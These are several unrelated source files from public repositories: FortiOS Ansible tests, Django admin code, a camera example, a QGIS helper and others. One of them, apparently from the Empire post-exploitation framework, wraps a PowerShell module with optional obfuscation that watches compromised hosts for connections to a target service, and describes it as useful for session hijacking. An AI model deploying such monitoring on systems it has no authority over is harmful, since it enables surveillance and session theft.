'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
bneg/Empire
|
refs/heads/master
|
lib/modules/powershell/situational_awareness/host/monitortcpconnections.py
|
10
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Start-MonitorTCPConnections',
# list of one or more authors for the module
'Author': ['@erikbarzdukas'],
# more verbose multi-line description of the module
'Description': ('Monitors hosts for TCP connections to a specified domain name or IPv4 address.'
' Useful for session hijacking and finding users interacting with sensitive services.'),
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : None,
# True if the module needs admin rights to run
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the language for this module
'Language' : 'powershell',
# The minimum PowerShell version needed for the module to run
'MinLanguageVersion' : '2',
# list of any references/other comments
'Comments': [
'Based on code from Tim Ferrell.',
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to monitor from.',
'Required' : True,
'Value' : ''
},
'TargetDomain' : {
'Description' : 'Domain name or IPv4 address of target service.',
'Required' : True,
'Value' : ''
},
'CheckInterval' : {
'Description' : 'Interval in seconds to check for the connection',
'Required' : True,
'Value' : '15'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Start-TCPMonitor"
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
|
pupil-labs/pyv4l2
|
refs/heads/master
|
example.py
|
1
|
import v4l2
import logging
# import cv2
from time import time
logging.basicConfig(level=logging.DEBUG)
from time import time,sleep
import numpy as np
if v4l2.list_devices() ==[]:
exit()
print v4l2.list_devices()
cap = v4l2.Capture("/dev/video0")
print cap.get_info()
cap.transport_formats
print cap.frame_rate
print cap.frame_size
print cap.transport_format,cap.transport_formats
cap.frame_size = (1920, 1080)
cap.frame_rate= (1,120)
controls = cap.enum_controls()
print controls
cap.set_control(controls[0]['id'],controls[0]['default'])
print cap.get_control(controls[0]['id'])
print 'Will capture at:',cap.transport_format,cap.frame_size,cap.frame_rate
for x in range(20):
try:
frame = cap.get_frame_robust()
except IOError:
print "could not grab frame"
break
# print frame.width,frame.height
# print frame.d
# y= frame.gray
# print v.shape
img = frame.yuv
y,u,v = img
# y = frame.bgr
# print y.data
# y = np.ones((1080,1920b,1))
# print y[].shape
# print u[]s.shape
# cv2.imshow("img",y)
# cv2.imshow("u",u)
# cv2.imshow("v",v)
# cv2.waitKey(1)
# print img
cap.close()
cap = None
|
spaceof7/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/grass7/ext/v_lrs_segment.py
|
5
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
v_lrs_segment.py
----------------
Date : March 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'March 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
def checkParameterValuesBeforeExecuting(alg):
""" Verify if we have the right parameters """
if alg.getParameterValue('in_file') and alg.getParameterValue(u'file'):
return alg.tr("You need to set either a segment rules file or write directly the rules!")
return None
def processInputs(alg):
# We need to import the rstable
rstable = alg.getParameterValue('rstable')
if rstable in list(alg.exportedLayers.keys()):
return
alg.exportedLayers[rstable] = alg.getTempFilename()
command = 'db.in.ogr input=\"{}\" output={} --overwrite'.format(
rstable,
alg.exportedLayers[rstable]
)
alg.commands.append(command)
alg.processInputs(context, parameters)
def processCommand(alg, parameters):
in_file = alg.getParameterValue('in_file')
if in_file:
# Creates a temporary txt file
ruleFile = alg.getTempFilename()
# Inject rules into temporary txt file
with open(ruleFile, "w") as tempRules:
tempRules.write(in_file)
else:
ruleFile = alg.getParameterValue('file')
output = alg.getOutputFromName(u'output')
alg.exportedLayers[output.value] = output.name + alg.uniqueSuffix
command = 'v.lrs.segment input={} file={} rstable={} output={} --overwrite'.format(
alg.exportedLayers[alg.getParameterValue('input')],
ruleFile,
alg.exportedLayers[alg.getParameterValue('rstable')],
alg.exportedLayers[output.value]
)
alg.commands.append(command)
|
bioconda/bioconda-utils
|
refs/heads/master
|
setup.py
|
1
|
# -*- coding: UTF-8 -*-
from setuptools import setup, find_packages
import versioneer
setup(
name='bioconda-utils',
author="Johannes Köster, Ryan Dale, The Bioconda Team",
description="Utilities for building and managing conda packages",
license="MIT",
packages=find_packages(exclude=['test']),
include_package_data=True,
data_files=[
(
'bioconda_utils',
[
'bioconda_utils/bioconda_utils-requirements.txt',
'bioconda_utils/config.schema.yaml',
],
)
],
entry_points={"console_scripts": [
"bioconda-utils = bioconda_utils.cli:main"
]},
classifiers=[
"Development Status :: 4 - Beta",
# "Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3"
],
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
)
|
shenyushun/cookiecutter-simple-django-cn
|
refs/heads/master
|
{{cookiecutter.project_slug}}/manage.py
|
78
|
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local')
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
pdellaert/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_wireless_controller_hotspot20_icon.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_wireless_controller_hotspot20_icon
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_wireless_controller_hotspot20_icon.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_wireless_controller_hotspot20_icon_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_wireless_controller_hotspot20_icon_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_wireless_controller_hotspot20_icon_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
delete_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_wireless_controller_hotspot20_icon_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
delete_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_wireless_controller_hotspot20_icon_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_wireless_controller_hotspot20_icon_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {
'random_attribute_not_valid': 'tag', 'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
madjar/cython
|
refs/heads/master
|
docs/sphinxext/ipython_console_highlighting.py
|
31
|
from pygments.lexer import Lexer, do_insertions
from pygments.lexers.agile import PythonConsoleLexer, PythonLexer, \
PythonTracebackLexer
from pygments.token import Comment, Generic
from sphinx import highlighting
import re
line_re = re.compile('.*?\n')
class IPythonConsoleLexer(Lexer):
"""
For IPython console output or doctests, such as:
Tracebacks are not currently supported.
.. sourcecode:: ipython
In [1]: a = 'foo'
In [2]: a
Out[2]: 'foo'
In [3]: print a
foo
In [4]: 1 / 0
"""
name = 'IPython console session'
aliases = ['ipython']
mimetypes = ['text/x-ipython-console']
input_prompt = re.compile("(In \[[0-9]+\]: )|( \.\.\.+:)")
output_prompt = re.compile("(Out\[[0-9]+\]: )|( \.\.\.+:)")
continue_prompt = re.compile(" \.\.\.+:")
tb_start = re.compile("\-+")
def get_tokens_unprocessed(self, text):
pylexer = PythonLexer(**self.options)
tblexer = PythonTracebackLexer(**self.options)
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
input_prompt = self.input_prompt.match(line)
continue_prompt = self.continue_prompt.match(line.rstrip())
output_prompt = self.output_prompt.match(line)
if line.startswith("#"):
insertions.append((len(curcode),
[(0, Comment, line)]))
elif input_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, input_prompt.group())]))
curcode += line[input_prompt.end():]
elif continue_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, continue_prompt.group())]))
curcode += line[continue_prompt.end():]
elif output_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Output, output_prompt.group())]))
curcode += line[output_prompt.end():]
else:
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
curcode = ''
insertions = []
yield match.start(), Generic.Output, line
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
def setup(app):
app.add_lexer('ipython', IPythonConsoleLexer())
|
abhattad4/Digi-Menu
|
refs/heads/master
|
tests/utils_tests/test_itercompat.py
|
569
|
from django.test import TestCase
from .models import Category, Thing
class TestIsIterator(TestCase):
def test_regression(self):
"""This failed on Django 1.5/Py2.6 because category has a next method."""
category = Category.objects.create(name='category')
Thing.objects.create(category=category)
Thing.objects.filter(category=category)
|
karyon/django
|
refs/heads/master
|
django/contrib/admin/templatetags/admin_list.py
|
30
|
from __future__ import unicode_literals
import datetime
import warnings
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (
display_for_field, display_for_value, label_for_field, lookup_field,
)
from django.contrib.admin.views.main import (
ALL_VAR, ORDER_VAR, PAGE_VAR, SEARCH_VAR,
)
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.template import Library
from django.template.loader import get_template
from django.templatetags.static import static
from django.urls import NoReverseMatch
from django.utils import formats
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
register = Library()
DOT = '.'
@register.simple_tag
def paginator_number(cl, i):
"""
Generates an individual page index link in a paginated list.
"""
if i == DOT:
return '... '
elif i == cl.page_num:
return format_html('<span class="this-page">{}</span> ', i + 1)
else:
return format_html('<a href="{}"{}>{}</a> ',
cl.get_query_string({PAGE_VAR: i}),
mark_safe(' class="end"' if i == cl.paginator.num_pages - 1 else ''),
i + 1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = cl.paginator, cl.page_num
pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = 3
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
# Otherwise, do some fancy
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_ENDS))
page_range.append(DOT)
page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
return {
'cl': cl,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
'page_range': page_range,
'ALL_VAR': ALL_VAR,
'1': 1,
}
def result_headers(cl):
"""
Generates the list column headers.
"""
ordering_field_columns = cl.get_ordering_field_columns()
for i, field_name in enumerate(cl.list_display):
text, attr = label_for_field(
field_name, cl.model,
model_admin=cl.model_admin,
return_attr=True
)
if attr:
field_name = _coerce_field_name(field_name, i)
# Potentially not sortable
# if the field is the action checkbox: no sorting and special class
if field_name == 'action_checkbox':
yield {
"text": text,
"class_attrib": mark_safe(' class="action-checkbox-column"'),
"sortable": False,
}
continue
admin_order_field = getattr(attr, "admin_order_field", None)
if not admin_order_field:
# Not sortable
yield {
"text": text,
"class_attrib": format_html(' class="column-{}"', field_name),
"sortable": False,
}
continue
# OK, it is sortable if we got this far
th_classes = ['sortable', 'column-{}'.format(field_name)]
order_type = ''
new_order_type = 'asc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if i in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(i).lower()
sort_priority = list(ordering_field_columns).index(i) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_primary = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
def make_qs_param(t, n):
return ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == i: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_primary.insert(0, param)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_primary.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if i not in ordering_field_columns:
o_list_primary.insert(0, make_qs_param(new_order_type, i))
yield {
"text": text,
"sortable": True,
"sorted": sorted,
"ascending": order_type == "asc",
"sort_priority": sort_priority,
"url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
"url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
"url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
"class_attrib": format_html(' class="{}"', ' '.join(th_classes)) if th_classes else '',
}
def _boolean_icon(field_val):
icon_url = static('admin/img/icon-%s.svg' %
{True: 'yes', False: 'no', None: 'unknown'}[field_val])
return format_html('<img src="{}" alt="{}" />', icon_url, field_val)
def _coerce_field_name(field_name, field_index):
"""
Coerce a field_name (which may be a callable) to a string.
"""
if callable(field_name):
if field_name.__name__ == '<lambda>':
return 'lambda' + str(field_index)
else:
return field_name.__name__
return field_name
def items_for_result(cl, result, form):
"""
Generates the actual list of data.
"""
def link_in_col(is_first, field_name, cl):
if cl.list_display_links is None:
return False
if is_first and not cl.list_display_links:
return True
return field_name in cl.list_display_links
first = True
pk = cl.lookup_opts.pk.attname
for field_index, field_name in enumerate(cl.list_display):
empty_value_display = cl.model_admin.get_empty_value_display()
row_classes = ['field-%s' % _coerce_field_name(field_name, field_index)]
try:
f, attr, value = lookup_field(field_name, result, cl.model_admin)
except ObjectDoesNotExist:
result_repr = empty_value_display
else:
empty_value_display = getattr(attr, 'empty_value_display', empty_value_display)
if f is None or f.auto_created:
if field_name == 'action_checkbox':
row_classes = ['action-checkbox']
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
result_repr = display_for_value(value, empty_value_display, boolean)
if allow_tags:
warnings.warn(
"Deprecated allow_tags attribute used on field {}. "
"Use django.utils.safestring.format_html(), "
"format_html_join(), or mark_safe() instead.".format(field_name),
RemovedInDjango20Warning
)
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_classes.append('nowrap')
else:
if isinstance(f.remote_field, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = empty_value_display
else:
result_repr = field_val
else:
result_repr = display_for_field(value, f, empty_value_display)
if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
row_classes.append('nowrap')
if force_text(result_repr) == '':
result_repr = mark_safe(' ')
row_class = mark_safe(' class="%s"' % ' '.join(row_classes))
# If list_display_links not defined, add the link tag to the first field
if link_in_col(first, field_name, cl):
table_tag = 'th' if first else 'td'
first = False
# Display link to the result's change_view if the url exists, else
# display just the result's representation.
try:
url = cl.url_for_result(result)
except NoReverseMatch:
link_or_text = result_repr
else:
url = add_preserved_filters({'preserved_filters': cl.preserved_filters, 'opts': cl.opts}, url)
# Convert the pk to something that can be used in Javascript.
# Problem cases are long ints (23L) and non-ASCII strings.
if cl.to_field:
attr = str(cl.to_field)
else:
attr = pk
value = result.serializable_value(attr)
link_or_text = format_html(
'<a href="{}"{}>{}</a>',
url,
format_html(
' data-popup-opener="{}"', value
) if cl.is_popup else '',
result_repr)
yield format_html('<{}{}>{}</{}>',
table_tag,
row_class,
link_or_text,
table_tag)
else:
# By default the fields come from ModelAdmin.list_editable, but if we pull
# the fields out of the form instead of list_editable custom admins
# can provide fields on a per request basis
if (form and field_name in form.fields and not (
field_name == cl.model._meta.pk.name and
form[cl.model._meta.pk.name].is_hidden)):
bf = form[field_name]
result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
yield format_html('<td{}>{}</td>', row_class, result_repr)
if form and not form[cl.model._meta.pk.name].is_hidden:
yield format_html('<td>{}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
# Wrapper class used to return items in a list_editable
# changelist, annotated with the form object for error
# reporting purposes. Needed to maintain backwards
# compatibility with existing admin templates.
def __init__(self, form, *items):
self.form = form
super(ResultList, self).__init__(*items)
def results(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
yield ResultList(form, items_for_result(cl, res, form))
else:
for res in cl.result_list:
yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
if form[cl.model._meta.pk.name].is_hidden:
yield mark_safe(force_text(form[cl.model._meta.pk.name]))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
"""
Displays the date hierarchy for date drill-down functionality.
"""
if cl.date_hierarchy:
field_name = cl.date_hierarchy
field = cl.opts.get_field(field_name)
dates_or_datetimes = 'datetimes' if isinstance(field, models.DateTimeField) else 'dates'
year_field = '%s__year' % field_name
month_field = '%s__month' % field_name
day_field = '%s__day' % field_name
field_generic = '%s__' % field_name
year_lookup = cl.params.get(year_field)
month_lookup = cl.params.get(month_field)
day_lookup = cl.params.get(day_field)
def link(filters):
return cl.get_query_string(filters, [field_generic])
if not (year_lookup or month_lookup or day_lookup):
# select appropriate start level
date_range = cl.queryset.aggregate(first=models.Min(field_name),
last=models.Max(field_name))
if date_range['first'] and date_range['last']:
if date_range['first'].year == date_range['last'].year:
year_lookup = date_range['first'].year
if date_range['first'].month == date_range['last'].month:
month_lookup = date_range['first'].month
if year_lookup and month_lookup and day_lookup:
day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
return {
'show': True,
'back': {
'link': link({year_field: year_lookup, month_field: month_lookup}),
'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
},
'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
}
elif year_lookup and month_lookup:
days = cl.queryset.filter(**{year_field: year_lookup, month_field: month_lookup})
days = getattr(days, dates_or_datetimes)(field_name, 'day')
return {
'show': True,
